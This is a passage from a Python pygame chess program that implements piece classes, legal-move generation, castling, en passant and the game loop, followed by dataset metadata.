self.currentPieceList[0].color, \n\t\t\t\t\t\t\t\t\t\t\tself.waitingPieceList[0].color)\n\t\t\t\t\t\t\t\t\t\tif endOption == QUIT:\n\t\t\t\t\t\t\t\t\t\t\tpygame.quit()\n\t\t\t\t\t\t\t\t\t\t\tsys.exit()\n\t\t\t\t\t\t\t\t\t\telif endOption == REMATCH:\n\t\t\t\t\t\t\t\t\t\t\tboard.reset()\n\t\t\t\t\t\t\t\t\t\t\tboard.draw()\n\t\t\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\t\t\t\telif endOption == MAINMENU:\n\t\t\t\t\t\t\t\t\t\t\tboard.reset()\n\t\t\t\t\t\t\t\t\t\t\treturn\n\t\t\t\t\t\t\t\t\tself.draw()\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\tself.changeTurn()\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tprint(self.selectedPiece.potentialSpaces)\n\t\t\t\t\t\t\t\t\tprint(\"piece at \", self.selectedPiece.position, \" can't move there!\")\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tif self.selectedPiece:\n\t\t\t\t\t\t\t\tselectedRank = self.selectedPiece.rank\n\t\t\t\t\t\t\t\t#self.selectedPiece.updatePotentialSpaces(self.currentPieceList, self.waitingPieceList, True)\n\t\t\t\t\t\t\t\t#check to append possible enpassant capture move if selected piece is pawn and an enemypawn doubled up\n\t\t\t\t\t\t\t\t#last move\n\t\t\t\t\t\t\t\tif clickedPosition in self.selectedPiece.potentialSpaces:\n\t\t\t\t\t\t\t\t\t#if selected piece is a king and castling available and chosen\n\t\t\t\t\t\t\t\t\tif selectedRank == kingRank and clickedPosition in self.selectedPiece.castlingPositions:\n\t\t\t\t\t\t\t\t\t\tfor rook in self.selectedPiece.rooksToCastle:\n\t\t\t\t\t\t\t\t\t\t\tif abs(rook.position[1]-clickedPosition[1]) <= 2: \n\t\t\t\t\t\t\t\t\t\t\t\tself.castle(self.selectedPiece, rook, clickedPosition)\n\t\t\t\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\t\t\telse:\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t\tif self.doubleUpPawn and clickedPosition == self.enPassantSpace:\n\t\t\t\t\t\t\t\t\t\t\tself.playKillSound()\n\t\t\t\t\t\t\t\t\t\t\tself.waitingPieceList.remove(self.doubleUpPawn)\n\t\t\t\t\t\t\t\t\t\t\tkilledPawnSquare = self.getSquarebyPosition(self.doubleUpPawn.position)\n\t\t\t\t\t\t\t\t\t\t\tkilledPawnSquare.draw(self.surface)\n\t\t\t\t\t\t\t\t\t\toldSquare = board.getSquarebyPosition(self.selectedPiece.position)\n\t\t\t\t\t\t\t\t\t\toldSquare.draw(board.surface)\n\t\t\t\t\t\t\t\t\t\tif selectedRank == pawnRank and abs(self.selectedPiece.row-clickedPosition[0]) == 2:\n\t\t\t\t\t\t\t\t\t\t\tself.doubleUpPawn = self.selectedPiece\n\t\t\t\t\t\t\t\t\t\tself.unhighlightMovableSquares()\n\t\t\t\t\t\t\t\t\t\tself.selectedPiece.move(clickedSquare)\n\t\t\t\t\t\t\t\t\t\tself.checkPawnPromotion(self.selectedPiece, self.currentPieceList)\n\t\t\t\t\t\t\t\t\t\tself.selectedPiece.draw(board.surface)\n\t\t\t\t\t\t\t\t\t#looking for checkmate!\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\tgameState = Board.getGameState(self.selectedPiece, self.currentPieceList, self.waitingPieceList)\n\t\t\t\t\t\t\t\t\tif gameState == CHECKMATE or gameState == STALEMATE:\n\t\t\t\t\t\t\t\t\t\tendOption = launchEndMenu(screen, gameState, self.currentPieceList[0].color,\n\t\t\t\t\t\t\t\t\t\t self.waitingPieceList[0].color)\n\t\t\t\t\t\t\t\t\t\tif endOption == QUIT:\n\t\t\t\t\t\t\t\t\t\t\tpygame.quit()\n\t\t\t\t\t\t\t\t\t\t\tsys.exit()\n\t\t\t\t\t\t\t\t\t\telif endOption == REMATCH:\n\t\t\t\t\t\t\t\t\t\t\tboard.reset()\n\t\t\t\t\t\t\t\t\t\t\tboard.draw()\n\t\t\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\t\t\t\telif endOption == MAINMENU:\n\t\t\t\t\t\t\t\t\t\t\tboard.reset()\n\t\t\t\t\t\t\t\t\t\t\treturn\n\t\t\t\t\t\t\t\t\tself.draw()\n\t\t\t\t\t\t\t\t\tself.changeTurn()\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tprint(self.selectedPiece.potentialSpaces)\n\t\t\t\t\t\t\t\t\tprint(\"piece at \", self.selectedPiece.position, \" can't move there!\")\n\n\"\"\"\nThis class serves as the base class for all pieces (pawn, knight, etc.)\nEach piece has the following attributes:\n- sprite: the sprite used to draw the piece\n- spriteGroup: the sprite group used to hold sprite\n- position: the position of the square that the piece occupies\n- color: color of the piece (either player1Color or player2Color)\n- rank: rank of the piece (pawnRank, knightRank, etc.)\n- potentialSpaces: a list of coordinate tuples of square positions\n that the square is able to legally move to\n- hasMoved: becomes true once the piece has moved atleast once\n\"\"\"\nclass Piece:\n\tsprite = None\n\tspriteGroup = None\n\tposition = 0, 0\n\trow = 0\n\tcol = 0\n\tcolor = \"\"\n\trank = \"\"\n\tpotentialSpaces = []\n\thasMoved = False\n\n\tdef __init__(self):\n\t\tpass\n\n\t\"\"\"\n\tDetermines whether moving to a particular space (futurePosition)\n\twill leave the king of this piece open, thereby making that move\n\tillegal. myPieceList is the piece's pieceList and opponentPieceList\n\tis the opponent's. This function returns true if a move is illegal,\n\tand is used at the end of the updatePotentialSpaces method of all\n\tPiece derived classes to filter illegal moves.\n\t\"\"\"\n\tdef leavesKingOpen(self, myPieceList, opponentPieceList, futurePosition):\n\t\tmyKing = Board.getPiecebyRank(myPieceList, kingRank)\n\t\toriginalKingPosition = myKing.position\n\t\tif Board.isOccupied(opponentPieceList, futurePosition):\n\t\t\tpotentialKill = Board.getPiecebyPosition(opponentPieceList, futurePosition)\n\t\t\t#new opponent piece list if king kills piece\n\t\t\tfutureOpponentPieceList = opponentPieceList.copy()\n\t\t\tfutureOpponentPieceList.remove(potentialKill)\n\t\t\t#new my piece list for new king position\n\t\t\tcurrentPosition = self.position\n\t\t\tself.position = futurePosition\n\t\t\tself.row = futurePosition[0]\n\t\t\tself.col = futurePosition[1]\n\t\t\tfor piece in futureOpponentPieceList:\n\t\t\t\t#if this king will be in opponent king's range\n\t\t\t\tif piece.rank == kingRank:\n\t\t\t\t\tif abs(myKing.position[0]-piece.position[0]) <= 1 and abs(myKing.position[1]-piece.position[1]) <= 1:\n\t\t\t\t\t\tmyKing.position = originalKingPosition\n\t\t\t\t\t\tmyKing.row = originalKingPosition[0]\n\t\t\t\t\t\tmyKing.col = originalKingPosition[1]\n\t\t\t\t\t\treturn True\n\t\t\t\t#all other pieces\n\t\t\t\telse:\n\t\t\t\t\t#save the current potential spaces of the opponent's piece\n\t\t\t\t\tcurrentPotentialSpaces = piece.potentialSpaces.copy()\n\t\t\t\t\t#generate potential spaces given the king kills the original piece\n\t\t\t\t\tpiece.updatePotentialSpaces(futureOpponentPieceList, myPieceList, False)\n\t\t\t\t\t#store spaces\n\t\t\t\t\tif myKing.position in piece.potentialSpaces:\n\t\t\t\t\t\tself.position = currentPosition\n\t\t\t\t\t\tself.row = currentPosition[0]\n\t\t\t\t\t\tself.col = currentPosition[1]\n\t\t\t\t\t\tpiece.potentialSpaces = currentPotentialSpaces\n\t\t\t\t\t\treturn True\n\t\t\t\t\t#reassign original spaces\n\t\t\t\t\tpiece.potentialSpaces = currentPotentialSpaces\n\t\t\tself.position = currentPosition\n\t\t\tself.row = currentPosition[0]\n\t\t\tself.col = currentPosition[1]\n\t\t\treturn False\n\t\telse:\n\t\t\tcurrentPosition = self.position\n\t\t\tself.position = futurePosition\n\t\t\tself.row = futurePosition[0]\n\t\t\tself.col = futurePosition[1]\n\t\t\tfor piece in opponentPieceList:\n\t\t\t\t#if this king will be in opponent king's range\n\t\t\t\tif piece.rank == kingRank:\n\t\t\t\t\tif abs(myKing.position[0]-piece.position[0]) <= 1 and abs(myKing.position[1]-piece.position[1]) <= 1:\n\t\t\t\t\t\tmyKing.position = originalKingPosition\n\t\t\t\t\t\tmyKing.row = originalKingPosition[0]\n\t\t\t\t\t\tmyKing.col = originalKingPosition[1]\n\t\t\t\t\t\treturn True\n\t\t\t\t#all other pieces\n\t\t\t\telse:\n\t\t\t\t\t#save the current potential spaces of the opponent's piece\n\t\t\t\t\tcurrentPotentialSpaces = piece.potentialSpaces.copy()\n\t\t\t\t\t#generate potential spaces given the king kills the original piece\n\t\t\t\t\tpiece.updatePotentialSpaces(opponentPieceList, myPieceList, False)\n\t\t\t\t\t#store spaces\n\t\t\t\t\tif myKing.position in piece.potentialSpaces:\n\t\t\t\t\t\tself.position = currentPosition\n\t\t\t\t\t\tself.row = currentPosition[0]\n\t\t\t\t\t\tself.col = currentPosition[1]\n\t\t\t\t\t\tpiece.potentialSpaces = currentPotentialSpaces\n\t\t\t\t\t\treturn True\n\t\t\t\t\t#reassign original spaces\n\t\t\t\t\tpiece.potentialSpaces = currentPotentialSpaces\n\t\t\tself.position = currentPosition\n\t\t\tself.row = currentPosition[0]\n\t\t\tself.col = currentPosition[1]\n\t\t\treturn False\n\n\t\"\"\" Draws the piece's sprite \"\"\"\n\tdef draw(self, surface):\n\t\tself.spriteGroup.draw(surface)\n\n\t\"\"\"\n\tMoves a piece to the square passed to the newSquare argument.\n\tWill assign hasMoved attribute to True.\n\t\"\"\"\n\tdef move(self, newSquare):\n\t\tself.position = newSquare.position\n\t\tself.row = self.position[0]\n\t\tself.col = self.position[1]\n\t\tself.sprite.rect.center = newSquare.square.center\n\t\tself.hasMoved = True\n\n\t\"\"\"\n\tMoves a piece to the square passed to the newSquare argument.\n\tUsed exclusively in the board.rotate() method. Does not change\n\tthe hasMoved attribute.\n\t\"\"\"\n\tdef setPosition(self, newSquare):\n\t\tself.position = newSquare.position\n\t\tself.row = self.position[0]\n\t\tself.col = self.position[1]\n\t\tself.sprite.rect.center = newSquare.square.center\n\n\t\"\"\"\n\tGenerates a new list of spaces that the piece can move to. Each\n\tPiece deriving class overrides this method, which is defined based\n\ton individual movesets. The piece's list of pieces and the piece list\n\tof the opponent must be passed as myPieceList and opponentPieceList,\n\trespectively. The checkMyKing is a boolean parameter that indicates\n\twhether or not to call the leavesKingOpen() method for each generated\n\tspace. This is done when leavesKingOpen is True. checkMyKing is \n\tsupposed to be True only when updating the spaces of a piece that is \n\tselected by a player and is intended to be moved. This function is \n\tcalled in the leavesKingOpen() method for opponent pieces, where the \n\tcheckMyKing parameter is passed as False.\n\t\"\"\"\n\tdef updatePotentialSpaces(self, myPieceList, opponentPieceList, checkMyKing):\n\t\tpass\n\n\n\"\"\"\nThe following classes represent chess pieces and derive from the \nPiece class. No new attributes are declared for any of these classes,\nwith the exception of the King class which has two new attributes \ncastlingPositions and rooksToCastle which both deal with castling.\nEach class has a unique overriden updatePotentialSpaces() method\nbased on its moveset, which updates the potentialSpaces attribute.\n\"\"\"\nclass Pawn(Piece):\n\tdef __init__(self, image, initialSquare, color):\n\t\tPiece.__init__(self)\n\t\tself.image = image\n\t\tself.sprite = PieceSprite(image, initialSquare.square.center)\n\t\tself.spriteGroup = pygame.sprite.Group(self.sprite)\n\t\tself.position = initialSquare.position\n\t\tself.row = initialSquare.position[0]\n\t\tself.col = initialSquare.position[1]\n\t\tself.color = color\n\t\tself.rank = pawnRank\n\t\tself.initialPosition = self.position\n\n\tdef updatePotentialSpaces(self, myPieceList, opponentPieceList, checkMyKing):\n\t\tself.potentialSpaces = []\n\t\t# Pawn can moveup or diagonal spaces if occupied by an opponent piece\n\t\tmoveup = []\n\t\tmoveDiagonals = []\n\t\tif self.color == player1Color:\n\t\t\tmoveup.append((self.row-1, self.col))\n\t\t\tif not Board.isOccupied(myPieceList, moveup[0]) and not Board.isOccupied(opponentPieceList, moveup[0]):\n\t\t\t\tself.potentialSpaces.append(moveup[0])\n\t\t\tif not self.hasMoved: # can move up 2 spaces if hasn't moved\n\t\t\t\tmoveup.append((self.row-2,self.col))\n\t\t\t\tif not Board.isOccupied(myPieceList, moveup[1]) and not Board.isOccupied(opponentPieceList, moveup[1]):\n\t\t\t\t\tself.potentialSpaces.append(moveup[1])\n\t\t\tmoveDiagonals = [(self.row-1, self.col+1), (self.row-1, self.col-1)]\n\t\telse:\n\t\t\tmoveup.append((self.row+1, self.col))\n\t\t\tif not Board.isOccupied(myPieceList, moveup[0]) and not Board.isOccupied(opponentPieceList, moveup[0]):\n\t\t\t\tself.potentialSpaces.append(moveup[0])\n\t\t\tif not self.hasMoved: # can move up 2 spaces if hasn't moved\n\t\t\t\tmoveup.append((self.row+2,self.col))\n\t\t\t\tif not Board.isOccupied(myPieceList, moveup[1]) and not Board.isOccupied(opponentPieceList, moveup[1]):\n\t\t\t\t\tself.potentialSpaces.append(moveup[1])\n\t\t\tmoveDiagonals = [(self.row+1, self.col+1), (self.row+1, self.col-1)]\n\t\tif Board.isOccupied(opponentPieceList, moveDiagonals[0]): self.potentialSpaces.append(moveDiagonals[0])\n\t\tif Board.isOccupied(opponentPieceList, moveDiagonals[1]): self.potentialSpaces.append(moveDiagonals[1])\n\t\t# if this piece is intended to be moved, check if moves leave king open\n\t\tif checkMyKing:\n\t\t\tfor space in self.potentialSpaces.copy():\n\t\t\t\tif Piece.leavesKingOpen(self, myPieceList, opponentPieceList, space):\n\t\t\t\t\tself.potentialSpaces.remove(space)\n\nclass Rook(Piece):\n\tdef __init__(self, image, initialSquare, color):\n\t\tPiece.__init__(self)\n\t\tself.image = image\n\t\tself.sprite = PieceSprite(image, initialSquare.square.center)\n\t\tself.spriteGroup = pygame.sprite.Group(self.sprite)\n\t\tself.position = initialSquare.position\n\t\tself.row = initialSquare.position[0]\n\t\tself.col = initialSquare.position[1]\n\t\tself.color = color\n\t\tself.rank = rookRank\n\n\n\tdef updatePotentialSpaces(self, myPieceList, opponentPieceList, checkMyKing):\n\t\tself.potentialSpaces = []\n\t\t# all squares below\n\t\tfor x in range(self.row+1, 9):\n\t\t\tpos = (x, self.col)\n\t\t\tif Board.isOccupied(myPieceList, pos): break\n\t\t\tif Board.isOccupied(opponentPieceList, pos):\n\t\t\t\tself.potentialSpaces.append(pos)\n\t\t\t\tbreak\n\t\t\tself.potentialSpaces.append(pos)\n\t\t# all squares above\n\t\tfor x in range(1, self.row):\n\t\t\tpos = (self.row-x, self.col)\n\t\t\tif Board.isOccupied(myPieceList, pos): break\n\t\t\tif Board.isOccupied(opponentPieceList, pos):\n\t\t\t\tself.potentialSpaces.append(pos)\n\t\t\t\tbreak\n\t\t\tself.potentialSpaces.append(pos)\n\t\t# all squares left\n\t\tfor x in range(1, self.col):\n\t\t\tpos = (self.row, self.col-x)\n\t\t\tif Board.isOccupied(myPieceList, pos): break\n\t\t\tif Board.isOccupied(opponentPieceList, pos):\n\t\t\t\tself.potentialSpaces.append(pos)\n\t\t\t\tbreak\n\t\t\tself.potentialSpaces.append(pos)\n\t\t# all squares right\n\t\tfor x in range(self.col+1, 9):\n\t\t\tpos = (self.row, x)\n\t\t\tif Board.isOccupied(myPieceList, pos): break\n\t\t\tif Board.isOccupied(opponentPieceList, pos):\n\t\t\t\tself.potentialSpaces.append(pos)\n\t\t\t\tbreak\n\t\t\tself.potentialSpaces.append(pos)\n\t\tif checkMyKing:\n\t\t\tfor space in self.potentialSpaces.copy():\n\t\t\t\tif Piece.leavesKingOpen(self, myPieceList, opponentPieceList, space):\n\t\t\t\t\tself.potentialSpaces.remove(space)\n\nclass Knight(Piece):\n\tdef __init__(self, image, initialSquare, color):\n\t\tPiece.__init__(self)\n\t\tself.image = image\n\t\tself.sprite = PieceSprite(image, initialSquare.square.center)\n\t\tself.spriteGroup = pygame.sprite.Group(self.sprite)\n\t\tself.position = initialSquare.position\n\t\tself.row = initialSquare.position[0]\n\t\tself.col = initialSquare.position[1]\n\t\tself.color = color\n\t\tself.rank = knightRank\n\n\tdef updatePotentialSpaces(self, myPieceList, opponentPieceList, checkMyKing):\n\t\tself.potentialSpaces = []\n\t\tmovableSpaces = []\n\t\tmovableSpaces.append((self.row+1, self.col+2))\n\t\tmovableSpaces.append((self.row+1, self.col-2))\n\t\tmovableSpaces.append((self.row-1, self.col+2))\n\t\tmovableSpaces.append((self.row-1, self.col-2))\n\t\tmovableSpaces.append((self.row+2, self.col+1))\n\t\tmovableSpaces.append((self.row+2, self.col-1))\n\t\tmovableSpaces.append((self.row-2, self.col+1))\n\t\tmovableSpaces.append((self.row-2, self.col-1))\n\t\tfor space in movableSpaces:\n\t\t\tif Board.isOccupied(myPieceList, space): pass\n\t\t\telif Board.isOccupied(opponentPieceList, space): self.potentialSpaces.append(space)\n\t\t\telif space[0]>0 and space[0]<9 and space[1]>0 and space[1]<9: self.potentialSpaces.append(space)\n\t\tif checkMyKing:\n\t\t\tfor space in self.potentialSpaces.copy():\n\t\t\t\tif Piece.leavesKingOpen(self, myPieceList, opponentPieceList, space):\n\t\t\t\t\tself.potentialSpaces.remove(space)\n\nclass Bishop(Piece):\n\tdef __init__(self, image, initialSquare, color):\n\t\tPiece.__init__(self)\n\t\tself.image = image\n\t\tself.sprite = PieceSprite(image, initialSquare.square.center)\n\t\tself.spriteGroup = pygame.sprite.Group(self.sprite)\n\t\tself.position = initialSquare.position\n\t\tself.row = initialSquare.position[0]\n\t\tself.col = initialSquare.position[1]\n\t\tself.color = color\n\t\tself.rank = bishopRank\n\n\tdef updatePotentialSpaces(self, myPieceList, opponentPieceList, checkMyKing):\n\t\tself.potentialSpaces = []\n\t\t# up right diagonal\n\t\tbound = min(self.row-1, 8-self.col)\n\t\tfor x in range(0, bound):\n\t\t\tpos = (self.row-(x+1), self.col+x+1)\n\t\t\tif Board.isOccupied(myPieceList, pos): break\n\t\t\tif Board.isOccupied(opponentPieceList, pos):\n\t\t\t\tself.potentialSpaces.append(pos)\n\t\t\t\tbreak\n\t\t\tself.potentialSpaces.append(pos)\n\t\t# up left diagonal\n\t\tbound = min(self.row-1, self.col-1)\n\t\tfor x in range(0, bound):\n\t\t\tpos = (self.row-(x+1), self.col-(x+1))\n\t\t\tif Board.isOccupied(myPieceList, pos): break\n\t\t\tif Board.isOccupied(opponentPieceList, pos):\n\t\t\t\tself.potentialSpaces.append(pos)\n\t\t\t\tbreak\n\t\t\tself.potentialSpaces.append(pos)\n\t\t# down right diagonal\n\t\tbound = min(8-self.row, 8-self.col)\n\t\tfor x in range(0, bound):\n\t\t\tpos = (self.row+x+1, self.col+x+1)\n\t\t\tif Board.isOccupied(myPieceList, pos): break\n\t\t\tif Board.isOccupied(opponentPieceList, pos):\n\t\t\t\tself.potentialSpaces.append(pos)\n\t\t\t\tbreak\n\t\t\tself.potentialSpaces.append(pos)\n\t\t# down left diagonal\n\t\tbound = min(8-self.row, self.col-1)\n\t\tfor x in range(0, bound):\n\t\t\tpos = (self.row+x+1, self.col-(x+1))\n\t\t\tif Board.isOccupied(myPieceList, pos): break\n\t\t\tif Board.isOccupied(opponentPieceList, pos):\n\t\t\t\tself.potentialSpaces.append(pos)\n\t\t\t\tbreak\n\t\t\tself.potentialSpaces.append(pos)\n\t\tif checkMyKing:\n\t\t\tfor space in self.potentialSpaces.copy():\n\t\t\t\tif Piece.leavesKingOpen(self, myPieceList, opponentPieceList, space):\n\t\t\t\t\tself.potentialSpaces.remove(space)\n\nclass Queen(Piece):\n\tdef __init__(self, image, initialSquare, color):\n\t\tPiece.__init__(self)\n\t\tself.image = image\n\t\tself.sprite = PieceSprite(image, initialSquare.square.center)\n\t\tself.spriteGroup = pygame.sprite.Group(self.sprite)\n\t\tself.position = initialSquare.position\n\t\tself.row = initialSquare.position[0]\n\t\tself.col = initialSquare.position[1]\n\t\tself.color = color\n\t\tself.rank = queenRank\n\n\tdef updatePotentialSpaces(self, myPieceList, opponentPieceList, checkMyKing):\n\t\tself.potentialSpaces = []\n\t\t# all squares below\n\t\tfor x in range(self.row+1, 9):\n\t\t\tpos = (x, self.col)\n\t\t\tif Board.isOccupied(myPieceList, pos): break\n\t\t\tif Board.isOccupied(opponentPieceList, pos):\n\t\t\t\tself.potentialSpaces.append(pos)\n\t\t\t\tbreak\n\t\t\tself.potentialSpaces.append(pos)\n\t\t# all squares above\n\t\tfor x in range(1, self.row):\n\t\t\tpos = (self.row-x, self.col)\n\t\t\tif Board.isOccupied(myPieceList, pos): break\n\t\t\tif Board.isOccupied(opponentPieceList, pos):\n\t\t\t\tself.potentialSpaces.append(pos)\n\t\t\t\tbreak\n\t\t\tself.potentialSpaces.append(pos)\n\t\t# all squares left\n\t\tfor x in range(1, self.col):\n\t\t\tpos = (self.row, self.col-x)\n\t\t\tif Board.isOccupied(myPieceList, pos): break\n\t\t\tif Board.isOccupied(opponentPieceList, pos):\n\t\t\t\tself.potentialSpaces.append(pos)\n\t\t\t\tbreak\n\t\t\tself.potentialSpaces.append(pos)\n\t\t# all squares right\n\t\tfor x in range(self.col+1, 9):\n\t\t\tpos = (self.row, x)\n\t\t\tif Board.isOccupied(myPieceList, pos): break\n\t\t\tif Board.isOccupied(opponentPieceList, pos):\n\t\t\t\tself.potentialSpaces.append(pos)\n\t\t\t\tbreak\n\t\t\tself.potentialSpaces.append(pos)\n\t\t# up right diagonal\n\t\tbound = min(self.row-1, 8-self.col)\n\t\tfor x in range(0, bound):\n\t\t\tpos = (self.row-(x+1), self.col+x+1)\n\t\t\tif Board.isOccupied(myPieceList, pos): break\n\t\t\tif Board.isOccupied(opponentPieceList, pos):\n\t\t\t\tself.potentialSpaces.append(pos)\n\t\t\t\tbreak\n\t\t\tself.potentialSpaces.append(pos)\n\t\t# up left diagonal\n\t\tbound = min(self.row-1, self.col-1)\n\t\tfor x in range(0, bound):\n\t\t\tpos = (self.row-(x+1), self.col-(x+1))\n\t\t\tif Board.isOccupied(myPieceList, pos): break\n\t\t\tif Board.isOccupied(opponentPieceList, pos):\n\t\t\t\tself.potentialSpaces.append(pos)\n\t\t\t\tbreak\n\t\t\tself.potentialSpaces.append(pos)\n\t\t# down right diagonal\n\t\tbound = min(8-self.row, 8-self.col)\n\t\tfor x in range(0, bound):\n\t\t\tpos = (self.row+x+1, self.col+x+1)\n\t\t\tif Board.isOccupied(myPieceList, pos): break\n\t\t\tif Board.isOccupied(opponentPieceList, pos):\n\t\t\t\tself.potentialSpaces.append(pos)\n\t\t\t\tbreak\n\t\t\tself.potentialSpaces.append(pos)\n\t\t# down left diagonal\n\t\tbound = min(8-self.row, self.col-1)\n\t\tfor x in range(0, bound):\n\t\t\tpos = (self.row+x+1, self.col-(x+1))\n\t\t\tif Board.isOccupied(myPieceList, pos): break\n\t\t\tif Board.isOccupied(opponentPieceList, pos):\n\t\t\t\tself.potentialSpaces.append(pos)\n\t\t\t\tbreak\n\t\t\tself.potentialSpaces.append(pos)\n\t\tif checkMyKing:\n\t\t\tfor space in self.potentialSpaces.copy():\n\t\t\t\tif Piece.leavesKingOpen(self, myPieceList, opponentPieceList, space):\n\t\t\t\t\tself.potentialSpaces.remove(space)\n\nclass King(Piece):\n\t# New attributes, used for castling\n\tcastlingPositions = []\n\trooksToCastle = []\n\tdef __init__(self, image, initialSquare, color):\n\t\tPiece.__init__(self)\n\t\tself.image = image\n\t\tself.sprite = PieceSprite(image, initialSquare.square.center)\n\t\tself.spriteGroup = pygame.sprite.Group(self.sprite)\n\t\tself.position = initialSquare.position\n\t\tself.row = initialSquare.position[0]\n\t\tself.col = initialSquare.position[1]\n\t\tself.color = color\n\t\tself.rank = kingRank\n\n\tdef updatePotentialSpaces(self, myPieceList, opponentPieceList, checkMyKing):\n\t\tself.potentialSpaces = []\n\t\tself.castlingPositions = []\n\t\tmovableSpaces = []\n\t\tmovableSpaces.append((self.row+1, self.col))\n\t\tmovableSpaces.append((self.row+1, self.col+1))\n\t\tmovableSpaces.append((self.row+1, self.col-1))\n\t\tmovableSpaces.append((self.row, self.col+1))\n\t\tmovableSpaces.append((self.row, self.col-1))\n\t\tmovableSpaces.append((self.row-1, self.col))\n\t\tmovableSpaces.append((self.row-1, self.col+1))\n\t\tmovableSpaces.append((self.row-1, self.col-1))\n\t\tfor space in movableSpaces:\n\t\t\tif space[0] >= 1 and space[0] <= 8 and space[1] >= 1 and space[1] <= 8:\n\t\t\t\tif Board.isOccupied(myPieceList, space): \n\t\t\t\t\tpass\n\t\t\t\telse:\n\t\t\t\t\tif not Piece.leavesKingOpen(self, myPieceList, opponentPieceList, space):\n\t\t\t\t\t\tself.potentialSpaces.append(space)\n\t\t# not CheckMyKing to prevent recursion between kings \n\t\t# when checking castling\n\t\tif not checkMyKing: return\n\t\tif not self.canCastle(myPieceList, opponentPieceList): \n\t\t\tself.castlingPositions = []\n\t\t\tself.rooksToCastle = []\n\t\t\n\t\"\"\"\n\tChecks if the king can castle. Appends possible castling positions\n\tand corresponding rooks to self.castlingPositions and \n\tself.rooksToCastle. Returns true if anything was appended to the \n\tmentioned lists (there are castling positions available).\n\t\"\"\"\n\tdef canCastle(self, myPieceList, opponentPieceList):\n\t\tif self.hasMoved: return False\n\t\tfor piece in opponentPieceList:\n\t\t\tif Board.checked(piece, opponentPieceList, myPieceList): return False\n\t\tmyRookList = []\n\t\tfor piece in myPieceList:\n\t\t\tif piece.rank == rookRank and not piece.hasMoved: myRookList.append(piece)\n\t\toriginalPosition = self.position\n\t\tfor rook in myRookList.copy():\n\t\t\tif rook.position[1] > self.position[1]:\n\t\t\t\tfor i in range(rook.position[1] - originalPosition[1] - 1):\n\t\t\t\t\tcheckPosition = originalPosition[0], originalPosition[1]+i+1\n\t\t\t\t\tif Board.isOccupied(myPieceList, checkPosition) or Board.isOccupied(opponentPieceList, checkPosition): \n\t\t\t\t\t\tmyRookList.remove(rook)\n\t\t\t\t\t\tbreak\n\t\t\t\t\tif Piece.leavesKingOpen(self, myPieceList, opponentPieceList, checkPosition): \n\t\t\t\t\t\tmyRookList.remove(rook)\n\t\t\t\t\t\tbreak\n\t\t\t\tif rook in myRookList: \n\t\t\t\t\tself.castlingPositions.append((originalPosition[0], originalPosition[1]+2))\n\t\t\t\t\tself.potentialSpaces.append((originalPosition[0], originalPosition[1]+2))\n\t\t\telse:\n\t\t\t\tfor i in range(originalPosition[1] - rook.position[1] - 1):\n\t\t\t\t\tcheckPosition = originalPosition[0], originalPosition[1]-(i+1)\n\t\t\t\t\tif Board.isOccupied(myPieceList, checkPosition) or Board.isOccupied(opponentPieceList, checkPosition): \n\t\t\t\t\t\tmyRookList.remove(rook)\n\t\t\t\t\t\tbreak\n\t\t\t\t\tif Piece.leavesKingOpen(self, myPieceList, opponentPieceList, checkPosition): \n\t\t\t\t\t\tmyRookList.remove(rook)\n\t\t\t\t\t\tbreak\n\t\t\t\tif rook in myRookList: \n\t\t\t\t\tself.castlingPositions.append((originalPosition[0], originalPosition[1]-2))\n\t\t\t\t\tself.potentialSpaces.append((originalPosition[0], originalPosition[1]-2))\n\t\tif len(myRookList) == 0: return False\n\t\tself.rooksToCastle = myRookList\n\t\treturn True\n\n\n\"\"\"\nEnd of Piece classes.\n\"\"\"\n\n\"\"\"\nSimple Sprite class deriving the abstract base class \npygame.sprite.Sprite used for the sprite attribute of\nPiece classes. A center argument is passed to the constructor \nto assign an initial location to the sprite.\n\"\"\"\nclass PieceSprite(pygame.sprite.Sprite):\n\tdef __init__(self, image, center):\n\t\tpygame.sprite.Sprite.__init__(self)\n\t\tself.image = image\n\t\tself.rect = self.image.get_rect()\n\t\tself.rect.center = center\n\npygame.init()\n\nscreenWidth = 600\nscreenHeight = 600\nscreen = pygame.display.set_mode((screenWidth, screenHeight))\npygame.display.set_icon(whiteKnightImage)\npygame.display.set_caption(screenCaption)\nscreen.fill(GREY)\nboardLength = screenHeight\nboardpos = (screenWidth-screenHeight)/2, 0\nboard = Board(screen, (boardpos), boardLength)\nwhile True:\n\tselectedOption = launchStartMenu(screen, screenWidth, screenHeight)\n\tif selectedOption == PLAYERVSPLAYER:\n\t\tboard.draw()\n\t\tboard.playPVP()", "sub_path": "ChessBoard2.py", "file_name": "ChessBoard2.py", "file_ext": "py", "file_size_in_byte": 37139, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pygame.Rect", "line_number": 30, "usage_type": "call"}, {"api_name": "pygame.draw.rect", "line_number": 37, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 37, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 54, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 54, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.load", "line_number": 162, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 162, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.play", "line_number": 163, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 163, "usage_type": "attribute"}, {"api_name": "random.randrange", "line_number": 256, "usage_type": "call"}, {"api_name": "pygame.mixer.music.load", "line_number": 257, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 257, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.play", "line_number": 258, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 258, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 262, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 262, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 263, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 263, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", 